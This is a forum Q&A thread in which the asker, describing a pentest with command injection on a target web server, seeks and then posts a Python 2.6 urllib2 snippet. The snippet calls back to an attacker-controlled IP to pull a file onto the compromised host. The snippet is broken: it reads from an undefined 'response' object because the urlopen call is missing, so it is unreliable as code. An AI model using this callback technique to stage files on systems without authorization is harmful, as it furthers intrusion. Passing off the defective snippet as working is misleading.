# Python26 script to grab a file from remote host

Tags: python, file, get, transfer

I'm looking for some help with a Python script.

I am doing a pentesting project and have gained access to do command injection and write files in a systems wwwroot directory with limited privs. ftp and telnet are both on the system but I don't have permissions to them. The one thing that could really be useful at this point is Python26 which is on the system and I can use.
I have minimal real life Python knowledge though.

My thought is... Is there a way to use a Python script to call back to my host machine and grab a file from my host machine? And if so, does anyone have any pointers on how to write a script for that?

Thanks in advance.

Comment: if on your host you have open port (for example installed server of FTP, WWW, etc.) then external computer can connect to your host. But it can depends on configurations of all routers between remote host and your host. You can find many tutorials how to use Python to connect to FTP, WWW or even to MAIL.

Comment: Thank you, I assumed that since I did not have perm to use ftp on the account that I wouldn't be able to use python in that way?

Comment: I will look more into the www direction though

Answer (score 0):

```
import urllib2
file = "success2.txt"
url = "http://xx.xx.xx.xx/test.txt"
fh = open(file, "w")
fh.write(response.read())
fh.close()
```

so this what I ended up doing after @furas's suggestion.

I did more research and found:
http://www.pythonforbeginners.com/python-on-the-web/how-to-use-urllib2-in-python/

which explained it quite well.

Hopefully this helps someone in the future.

As I understand the code.
You first set the variable "file" which is what you will write to (absolute paths may matter for remote use)
Then you set the url of where the file is and the file name

The code then file to write to. Then it writes the file it has opened from the url.

Unlike ftp this doesn't seem to 'copy' the file directly. So you may need to use "wb" in the fh = open(file, "w") which does something about binary. I am not 100% the difference between w and wb but this method worked for me.